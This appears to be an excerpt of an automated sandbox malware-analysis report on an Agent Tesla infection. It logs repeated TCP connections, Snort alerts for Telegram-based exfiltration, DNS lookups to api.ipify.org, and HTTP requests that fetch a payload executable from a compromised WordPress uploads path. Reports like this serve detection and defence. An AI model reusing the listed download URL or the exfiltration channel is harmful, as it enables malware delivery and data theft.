                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49725 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49728 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXrN.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox ViewIP Address: 64.185.227.156 64.185.227.156
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                Source: msdt.exe, 00000004.00000002.444523521.0000000002F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.499260856.0000000005C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w-
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.497239392.0000000005C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.546642632.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.514679156.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507511308.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.514603755.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers(
                Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503862428.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/N
